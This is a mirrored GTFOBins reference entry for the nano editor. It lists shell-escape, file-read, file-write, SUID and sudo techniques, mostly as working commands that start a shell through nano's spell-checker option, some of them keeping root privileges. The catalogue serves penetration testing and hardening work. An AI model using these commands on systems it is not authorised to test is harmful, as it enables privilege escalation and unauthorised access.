mirror of
				https://github.com/GTFOBins/GTFOBins.github.io
				synced 2025-11-04 10:48:50 +01:00 
			
		
		
		
	
		
			
				
	
	
		
			35 lines
		
	
	
		
			950 B
		
	
	
	
		
			Markdown
		
	
	
	
	
	
			
		
		
	
	
			35 lines
		
	
	
		
			950 B
		
	
	
	
		
			Markdown
		
	
	
	
	
	
---
 | 
						|
functions:
 | 
						|
  shell:
 | 
						|
    - description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
 | 
						|
      code: |
 | 
						|
        TF=$(mktemp)
 | 
						|
        echo 'exec sh' > $TF
 | 
						|
        chmod +x $TF
 | 
						|
        nano -s $TF /etc/hosts
 | 
						|
        ^T
 | 
						|
  file-write:
 | 
						|
    - code: |
 | 
						|
        nano file_to_write
 | 
						|
        DATA
 | 
						|
        ^O
 | 
						|
  file-read:
 | 
						|
    - code: nano file_to_read
 | 
						|
  suid:
 | 
						|
    - description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
 | 
						|
      code: |
 | 
						|
        TF=$(mktemp)
 | 
						|
        echo 'exec sh -p' > $TF
 | 
						|
        chmod +x $TF
 | 
						|
        ./nano -s $TF /etc/hosts
 | 
						|
        ^T
 | 
						|
  sudo:
 | 
						|
    - description: The `SPELL` environment variable can be used in place of the `-s` option if the command line cannot be changed.
 | 
						|
      code: |
 | 
						|
        TF=$(mktemp)
 | 
						|
        echo 'exec sh' > $TF
 | 
						|
        chmod +x $TF
 | 
						|
        sudo nano -s $TF /etc/hosts
 | 
						|
        ^T
 | 
						|
---
 |